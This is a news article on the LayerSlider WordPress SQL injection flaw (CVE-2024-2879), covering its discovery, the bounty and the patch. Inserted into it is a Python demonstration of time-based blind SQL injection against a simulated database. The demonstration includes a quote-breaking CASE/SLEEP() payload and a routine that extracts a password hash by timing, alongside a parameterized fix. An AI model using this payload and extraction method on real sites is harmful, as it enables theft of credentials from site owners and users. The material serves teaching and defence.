Critical Security Flaw Exposes 1 Million WordPress Sites to SQL Injection

Published: 23/11/2024   Category: security




A researcher received a $5,500 bug bounty for discovering a vulnerability (CVE-2024-2879) in LayerSlider, a plug-in with more than a million active installations.



Attackers can exploit a critical SQL injection vulnerability found in a widely used WordPress plug-in to compromise more than 1 million sites and extract sensitive data such as password hashes from the associated databases.

A security researcher called AmrAwad (aka 1337_Wannabe) discovered the bug in LayerSlider, a plug-in for creating animated Web content. The flaw, tracked as CVE-2024-2879, has a rating of 9.8 out of 10 on the CVSS 3.0 vulnerability-severity scale and is associated with the ls_get_popup_markup action in LayerSlider versions 7.9.11 through 7.10.0. The vulnerability is due to insufficient escaping of the user-supplied parameter and a lack of sufficient preparation of the existing SQL query, according to Wordfence. This makes it possible for unauthenticated attackers to append additional SQL queries to already existing queries, which can be used to extract sensitive information from the database, the company said.

Wordfence awarded the researcher a bounty of $5,500, the company's highest bounty to date, for the discovery, according to a blog post by Wordfence. AmrAwad's March 25 submission came as part of Wordfence's second Bug Bounty Extravaganza, and the company contacted the Kreatura Team, developers of the plug-in, the same day to notify them of the flaw. The team responded the next day and delivered a patch in version 7.10.1 of LayerSlider on March 27.

The potential for exploitation lies in the insecure implementation of the LayerSlider plug-in's slider popup markup query functionality, which takes an id parameter, according to Wordfence. If the id parameter is not a number, it is passed without sanitization to the find() function in the LS_Sliders class, which builds the query as a raw SQL statement without calling prepare(). Since prepare() would parameterize and escape the query for safe execution in WordPress, thereby providing protection against SQL injection attacks, its absence creates a vulnerable scenario, according to Wordfence.

However, exploiting the flaw requires a time-based blind approach on the part of attackers to extract database information: an intricate, yet frequently successful, method of obtaining information from a database when exploiting SQL injection vulnerabilities, according to Wordfence. Because the query's result is never returned to the attacker, they would need to use SQL CASE statements along with the SLEEP() command, observing the response time of each request to infer the contents of the database one piece at a time, the company explained.
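The pattern Wordfence describes, and the timing oracle built on top of it, as an added example that is not LayerSlider's or Wordfence's code. The table names, the find() logic, the sample rows and the hash value are assumptions modelled on the description above: a numeric id takes a safe path, anything else is concatenated into the WHERE clause with no escaping and no prepare(). SQLite stands in for MySQL, with a registered SLEEP() so the oracle works offline, and the hardened find_fixed() shows the parameterized form that prepare() would produce. The extraction routine goes a step beyond the text: it binary-searches each character's code point, so a whole hash is recovered with about seven timed requests per position rather than one request per candidate character.

```python
"""Time-based blind SQL injection against a simulated slider lookup (added example)."""
import sqlite3
import time

# A real MySQL SLEEP(1) pauses a full second; scaled down here to keep the demo fast.
SLEEP_SECONDS = 0.05
THRESHOLD = SLEEP_SECONDS / 2

# Constructed sample value, not a real credential: 8 printable ASCII characters.
SAMPLE_HASH = "$P$BsXoB"


def make_db():
    """In-memory SQLite with an assumed slider table, a user row, and a SLEEP() stand-in."""
    conn = sqlite3.connect(":memory:")

    def sleep(seconds):          # mimics MySQL's SLEEP(): pauses, then returns 0
        time.sleep(seconds * SLEEP_SECONDS)
        return 0

    conn.create_function("SLEEP", 1, sleep)
    conn.executescript(
        "CREATE TABLE wp_layerslider (id INTEGER PRIMARY KEY, name TEXT, data TEXT);"
        "CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);"
        "INSERT INTO wp_layerslider VALUES (1, 'home', '{}');"
    )
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (SAMPLE_HASH,))
    return conn


def find_vulnerable(conn, slider_id):
    """The flawed pattern: a numeric id is handled safely, anything else is
    pasted straight into the WHERE clause (no escaping, no prepare())."""
    if str(slider_id).isdigit():
        where = "id = %d" % int(slider_id)
    else:
        where = "name = '%s'" % slider_id          # injection point
    return conn.execute("SELECT id, name, data FROM wp_layerslider WHERE " + where).fetchall()


def find_fixed(conn, slider_id):
    """Hardened form: the value is bound as a parameter, which is what
    running the statement through $wpdb->prepare() achieves."""
    if str(slider_id).isdigit():
        sql, arg = "SELECT id, name, data FROM wp_layerslider WHERE id = ?", int(slider_id)
    else:
        sql, arg = "SELECT id, name, data FROM wp_layerslider WHERE name = ?", slider_id
    return conn.execute(sql, (arg,)).fetchall()


def response_time(find, conn, slider_id):
    """Seconds the simulated request takes; an SQL error is just another fast response."""
    start = time.perf_counter()
    try:
        find(conn, slider_id)
    except sqlite3.Error:
        pass
    return time.perf_counter() - start


def oracle_payload(condition):
    """Closes the quoted name, ORs in a CASE that sleeps only when the condition
    holds, and comments out the remainder of the original statement."""
    return ("x' OR (SELECT CASE WHEN %s THEN SLEEP(1) ELSE 0 END "
            "FROM wp_users WHERE ID = 1) -- " % condition)


def injection_fires(conn, find):
    """True if an always-true condition measurably delays the response."""
    return response_time(find, conn, oracle_payload("1 = 1")) > THRESHOLD


def extract_hash(conn, find, length):
    """Recover user_pass one character at a time, binary-searching each code
    point in 32..126 from the slow/fast answer to 'is it greater than mid?'."""
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "unicode(substr(user_pass, %d, 1)) > %d" % (pos, mid)
            if response_time(find, conn, oracle_payload(cond)) > THRESHOLD:
                lo = mid + 1        # slow: condition true, character is above mid
            else:
                hi = mid            # fast: condition false, character is at or below mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable find() delays on injected SLEEP:", injection_fires(db, find_vulnerable))
    print("fixed find() delays on injected SLEEP:     ", injection_fires(db, find_fixed))
    print("recovered via timing alone:                ", extract_hash(db, find_vulnerable, len(SAMPLE_HASH)))
```

Against find_vulnerable() the same payload also works as a plain boolean bypass (`x' OR 1=1 -- ` returns every slider row), but on the real endpoint that output is never shown to the caller, which is why the timing channel matters. Against find_fixed() the payload is compared literally with the name column, returns nothing, and never reaches SLEEP().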
Vulnerable WordPress sites are a popular target for attackers given the content management system's widespread use across the Internet, and vulnerabilities often exist in the plug-ins that independent developers create to add functionality to sites using the platform. Indeed, at least 43% of websites on the entire Internet use WordPress to power their sites, e-commerce applications, and communities. Further, the wealth of sensitive data such as user passwords and payment info often stored within them represents a significant opportunity for threat actors who seek to misuse it.

"Making the WordPress ecosystem more secure ... ultimately makes the entire web more secure," WordPress noted.

Wordfence advised that WordPress users with LayerSlider installed on their sites verify immediately that they are updated to the latest, patched version of the plug-in (7.10.1 or later) to ensure it isn't vulnerable to exploit.
